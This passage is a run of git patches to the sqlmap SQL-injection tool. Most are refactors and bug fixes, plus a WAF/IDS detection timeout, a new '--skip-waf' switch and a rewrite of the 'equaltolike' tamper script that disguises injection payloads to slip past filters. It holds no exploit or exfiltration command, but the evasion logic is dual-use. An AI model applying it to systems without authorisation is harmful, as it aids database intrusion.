logger.error("Failed to load and parse " + url) + logger.error("Failed to load and parse %s" % url) raise return text @@ -707,10 +707,10 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): if not taskid: logger.error("No task ID in use") continue - raw = _client(addr + "/scan/" + taskid + "/" + command) + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) res = dejsonize(raw) if not res["success"]: - logger.error("Failed to execute command " + command) + logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("new"): @@ -730,7 +730,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): if cmdLineOptions[key] is None: del cmdLineOptions[key] - raw = _client(addr + "/task/new") + raw = _client("%s/task/new" % addr) res = dejsonize(raw) if not res["success"]: logger.error("Failed to create new task") @@ -738,7 +738,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): taskid = res["taskid"] logger.info("New task ID is '%s'" % taskid) - raw = _client(addr + "/scan/" + taskid + "/start", cmdLineOptions) + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) res = dejsonize(raw) if not res["success"]: logger.error("Failed to start scan") @@ -758,10 +758,12 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): logger.info("Switching to task ID '%s' " % taskid) elif command in ("list", "flush"): - raw = _client(addr + "/admin/0/" + command) + raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) res = dejsonize(raw) if not res["success"]: - logger.error("Failed to execute command " + command) + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None dataToStdout("%s\n" % raw) elif command in ("exit", "bye", "quit", 'q'): From 27707be467da0a947ce4f33ec655b8cbf64c9f89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 17:09:36 +0200 Subject: [PATCH 28/92] Fixes #1416 --- lib/request/connect.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index fe7c4cd23..a49bba0a3 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1053,9 +1053,9 @@ class Connect(object): _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) finally: kb.pageCompress = popValue() From f96edc951cdd159b7221603db3555622718fe284 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 11:02:56 +0200 Subject: [PATCH 29/92] Patches #1419 --- plugins/dbms/mssqlserver/enumeration.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 9ea67eff9..a16e7a228 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -336,7 +336,7 @@ class Enumeration(GenericEnumeration): values = [values] for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) if foundTbl is None: continue From 3fca379f2905bc4d20c558b2299aa000b3d8e9f2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 11:25:59 +0200 Subject: [PATCH 30/92] Minor patch (avoiding message 'can't establish SSL connection' in --check-tor) --- lib/core/option.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index e2157806a..060043aa8 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2244,7 +2244,11 @@ def _checkTor(): infoMsg = "checking Tor connection" logger.info(infoMsg) - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + except SqlmapConnectionException: + page = None + if not page or 'Congratulations' not in page: errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" raise SqlmapConnectionException(errMsg) From 56f0b811a6f52623fd08cf0aee149f76ba7baf36 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 13:23:56 +0200 Subject: [PATCH 31/92] Minor patch --- lib/controller/checks.py | 10 ++++++++++ lib/core/settings.py | 3 +++ 2 files changed, 13 insertions(+) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 2cb131ad3..bb2d62d6c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -39,6 +39,7 @@ from lib.core.common import singleTimeWarnMessage from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError +from lib.core.defaults import defaults from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -68,6 +69,7 @@ from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.settings import IDS_WAF_CHECK_RATIO +from lib.core.settings import IDS_WAF_CHECK_TIMEOUT from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.inject import checkBooleanExpression @@ -1153,12 +1155,16 @@ def checkWaf(): value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload)) + pushValue(conf.timeout) + conf.timeout = IDS_WAF_CHECK_TIMEOUT + try: retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO except SqlmapConnectionException: retVal = True finally: kb.matchRatio = None + conf.timeout = popValue() if retVal: warnMsg = "heuristics detected that the target " @@ -1173,6 +1179,10 @@ def checkWaf(): if output and output[0] in ("Y", "y"): conf.identifyWaf = True + if conf.timeout == defaults.timeout: + logger.warning("dropping timeout to 5 seconds (i.e. '--timeout=5')") + conf.timeout = 5 + return retVal def identifyWaf(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 303c10cf4..c18eb57dd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -42,6 +42,9 @@ CONSTANT_RATIO = 0.9 # Ratio used in heuristic check for WAF/IDS/IPS protected targets IDS_WAF_CHECK_RATIO = 0.5 +# Timeout used in heuristic check for WAF/IDS/IPS protected targets +IDS_WAF_CHECK_TIMEOUT = 10 + # Lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 From e81e47464666f65daf8eb9a1dca6e3a517b9894c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 14:46:34 +0200 Subject: [PATCH 32/92] Minor adjustment --- lib/controller/checks.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index bb2d62d6c..ea3dc618d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1180,8 +1180,8 @@ def checkWaf(): conf.identifyWaf = True if conf.timeout == defaults.timeout: - logger.warning("dropping timeout to 5 seconds (i.e. '--timeout=5')") - conf.timeout = 5 + logger.warning("dropping timeout to %d seconds (i.e. '--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT)) + conf.timeout = IDS_WAF_CHECK_TIMEOUT return retVal From 81caf14b6dc727ef87b317d37c3ab7f07ac29bfe Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 14:57:44 +0200 Subject: [PATCH 33/92] Adding switch --skip-waf --- lib/controller/checks.py | 8 ++++---- lib/core/option.py | 4 ++++ lib/core/optiondict.py | 1 + lib/parse/cmdline.py | 4 ++++ sqlmap.conf | 4 ++++ 5 files changed, 17 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index ea3dc618d..eac95629e 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1142,12 +1142,12 @@ def checkWaf(): Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse """ - if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)): + if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)): return None - dbmMsg = "heuristically checking if the target is protected by " - dbmMsg += "some kind of WAF/IPS/IDS" - logger.debug(dbmMsg) + infoMsg = "checking if the target is protected by " + infoMsg += "some kind of WAF/IPS/IDS" + logger.info(infoMsg) retVal = False payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) diff --git a/lib/core/option.py b/lib/core/option.py index 060043aa8..6eb4433a5 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2295,6 +2295,10 @@ def _basicOptionValidation(): errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) + if conf.identifyWaf and conf.skipWaf: + errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" + raise SqlmapSyntaxException(errMsg) + if conf.titles and conf.nullConnection: errMsg = "switch '--titles' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 0445ccb09..3ff1ded01 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -231,6 +231,7 @@ optDict = { "cpuThrottle": "integer", "forceDns": "boolean", "identifyWaf": "boolean", + "skipWaf": "boolean", "ignore401": "boolean", "smokeTest": "boolean", "liveTest": "boolean", diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index bd06c1867..6d417fc21 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -713,6 +713,10 @@ def cmdLineParser(argv=None): action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection") + miscellaneous.add_option("--skip-waf", dest="skipWaf", + action="store_true", + help="Skip heuristic detection of WAF/IPS/IDS protection") + miscellaneous.add_option("--mobile", dest="mobile", action="store_true", help="Imitate smartphone through HTTP User-Agent header") diff --git a/sqlmap.conf b/sqlmap.conf index d7db6c376..c18159375 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -750,6 +750,10 @@ googlePage = 1 # Valid: True or False identifyWaf = False +# Skip heuristic detection of WAF/IPS/IDS protection. +# Valid: True or False +skipWaf = False + # Imitate smartphone through HTTP User-Agent header. # Valid: True or False mobile = False From 0e22a0ca5f901c721a50fbea7c7bde2f2cbbb213 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 16:41:54 +0200 Subject: [PATCH 34/92] Minor cosmetics --- lib/core/dump.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index a4ff91913..03caf233b 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -636,11 +636,11 @@ class Dump(object): for column in dbColumnsDict.keys(): if colConsider == "1": - colConsiderStr = "s like '%s' were" % unsafeSQLIdentificatorNaming(column) + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) else: colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) - msg = "Column%s found in the " % colConsiderStr + msg = "column%s found in the " % colConsiderStr msg += "following databases:" self._write(msg) From 74294ae105b2af02fc0713513e45f71290b20563 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 11:28:56 +0200 Subject: [PATCH 35/92] Bug fix for --common-tables in case of MsSQL/Sybase (safeSQLIdentificatorNaming already used) --- lib/techniques/brute/use.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py index 4a1594590..5c25cdf7d 100644 --- a/lib/techniques/brute/use.py +++ b/lib/techniques/brute/use.py @@ -28,9 +28,9 @@ from lib.core.enums import HASHDB_KEYS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import METADB_SUFFIX from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request import inject @@ -102,7 +102,7 @@ def tableExists(tableFile, regex=None): break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) + fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table From 03da24b24961c92f44a62ae37753c66e83873485 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 12:03:47 +0200 Subject: [PATCH 36/92] Minor cosmetics --- plugins/generic/databases.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 7c671c92e..f76bafa9b 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -509,7 +509,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -604,7 +604,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) From 058f63a0506f072b3e36b3a6e106fb2c429edc17 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 12:33:11 +0200 Subject: [PATCH 37/92] Patch for annoying retrieval of columns during dump (if -C used) --- plugins/generic/databases.py | 54 +++++++++++++++++++++--------------- plugins/generic/entries.py | 2 +- 2 files changed, 32 insertions(+), 24 deletions(-) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index f76bafa9b..455403cc4 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -370,7 +370,7 @@ class Databases: return kb.data.cachedTables - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -517,10 +517,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -534,7 +530,14 @@ class Databases: elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.inband.query % tbl - values = inject.getValue(query, blind=False, time=False) + if dumpMode and colList: + values = [(_,) for _ in colList] + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] @@ -612,10 +615,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -639,22 +638,31 @@ class Databases: parseSqliteTableSchema(value) return kb.data.cachedColumns - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - table = {} columns = {} - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 + if dumpMode and colList: + count = 0 + for value in colList: + columns[safeSQLIdentificatorNaming(value)] = None + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + count, index, values = 0, 1, [] + while True: + query = rootQuery.blind.query3 % (conf.db, tbl, index) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if isNoneValue(value) or value == " ": + break + else: + columns[safeSQLIdentificatorNaming(value)] = None + index += 1 if not columns: errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 1d9e770b7..dcfe3f4f5 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -103,7 +103,7 @@ class Entries: if foundData is None: kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True) + self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData From 158ae501c14009b661fd66bd398ddc70c8933a2b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 14:32:52 +0200 Subject: [PATCH 38/92] Bug fix for tamper script equaltolike (has been doing problems when used with MsSQL) --- tamper/equaltolike.py | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index d9ccf0082..51ce4c5ea 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -35,15 +35,10 @@ def tamper(payload, **kwargs): 'SELECT * FROM users WHERE id LIKE 1' """ - def process(match): - word = match.group() - word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") - - return word - retVal = payload if payload: - retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + for regex, subst in ((r"\s+=\s+", " LIKE "), (r"\s+=", " LIKE"), (r"=\s+", "LIKE ")): + retVal = re.sub(regex, subst, retVal) return retVal From aa088aafd2b8198af0e509d99b2cb0465b0fab8c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 23 Sep 2015 08:47:52 +0200 Subject: [PATCH 39/92] Looks more technical --- plugins/dbms/mssqlserver/enumeration.py | 12 ++++++------ plugins/generic/search.py | 26 ++++++++++++------------- 2 files changed, 19 insertions(+), 19 deletions(-) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index a16e7a228..0aa86ae32 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -184,7 +184,7 @@ class Enumeration(GenericEnumeration): infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -217,7 +217,7 @@ class Enumeration(GenericEnumeration): else: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -229,7 +229,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -295,7 +295,7 @@ class Enumeration(GenericEnumeration): infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} @@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (column, db) logger.info("%s%s" % (infoMsg, infoMsgTbl)) @@ -380,7 +380,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % column warnMsg += "in database '%s'" % db logger.warn(warnMsg) diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 1a4a5b02b..0069a1af3 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -65,7 +65,7 @@ class Search: infoMsg = "searching database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -98,7 +98,7 @@ class Search: if not values and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -113,7 +113,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no database" if dbConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -172,7 +172,7 @@ class Search: infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) if dbCond and conf.db and conf.db != CURRENT_DB: @@ -225,7 +225,7 @@ class Search: if len(whereDbsQuery) == 0: infoMsg = "fetching number of databases with table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -236,7 +236,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.warn(warnMsg) @@ -274,7 +274,7 @@ class Search: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -288,7 +288,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -390,7 +390,7 @@ class Search: infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} @@ -468,7 +468,7 @@ class Search: if not conf.db: infoMsg = "fetching number of databases with tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) @@ -479,7 +479,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.warn("%s%s" % (warnMsg, infoMsgTbl)) @@ -519,7 +519,7 @@ class Search: infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -533,7 +533,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) From 29bdcf0e651cb30277c2497a3c5994b2c93419e5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 23 Sep 2015 15:31:25 +0200 Subject: [PATCH 40/92] Fixes #1425 --- thirdparty/multipart/multipartpost.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py index e9aa1a85e..07a6e4e71 100644 --- a/thirdparty/multipart/multipartpost.py +++ b/thirdparty/multipart/multipartpost.py @@ -73,7 +73,7 @@ class MultipartPostHandler(urllib2.BaseHandler): request.add_data(data) return request - def multipart_encode(vars, files, boundary = None, buf = None): + def multipart_encode(vars, files, boundary=None, buf=None): if boundary is None: boundary = mimetools.choose_boundary() @@ -100,7 +100,7 @@ class MultipartPostHandler(urllib2.BaseHandler): # buf += 'Content-Length: %s\r\n' % file_size fd.seek(0) - buf = str(buf) + buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8") buf += '\r\n%s\r\n' % fd.read() buf += '--%s--\r\n\r\n' % boundary From 12b9939baaaa8b8b976da431cffdce7a63bc230e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 10:24:37 +0200 Subject: [PATCH 41/92] Minor refactoring --- tamper/equaltolike.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index 51ce4c5ea..05615355b 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -38,7 +38,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - for regex, subst in ((r"\s+=\s+", " LIKE "), (r"\s+=", " LIKE"), (r"=\s+", "LIKE ")): - retVal = re.sub(regex, subst, retVal) + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal From e19b097ab55ff66ba30194d38fec00cd0d10bcdc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 11:49:05 +0200 Subject: [PATCH 42/92] Bug fix (--columns has been broken for last couple of days) --- plugins/generic/databases.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 455403cc4..dba018808 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -664,12 +664,12 @@ class Databases: columns[safeSQLIdentificatorNaming(value)] = None index += 1 - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue + if not columns: + errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") + errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.error(errMsg) + continue for index in getLimitRange(count): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): From ea4cef9c6d3bde2e7479c5e96657fec2459809d7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 13:44:51 +0200 Subject: [PATCH 43/92] Skipping quit exception in case of --search --- plugins/dbms/mssqlserver/enumeration.py | 2 +- plugins/generic/databases.py | 6 ++++-- plugins/generic/entries.py | 4 +++- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 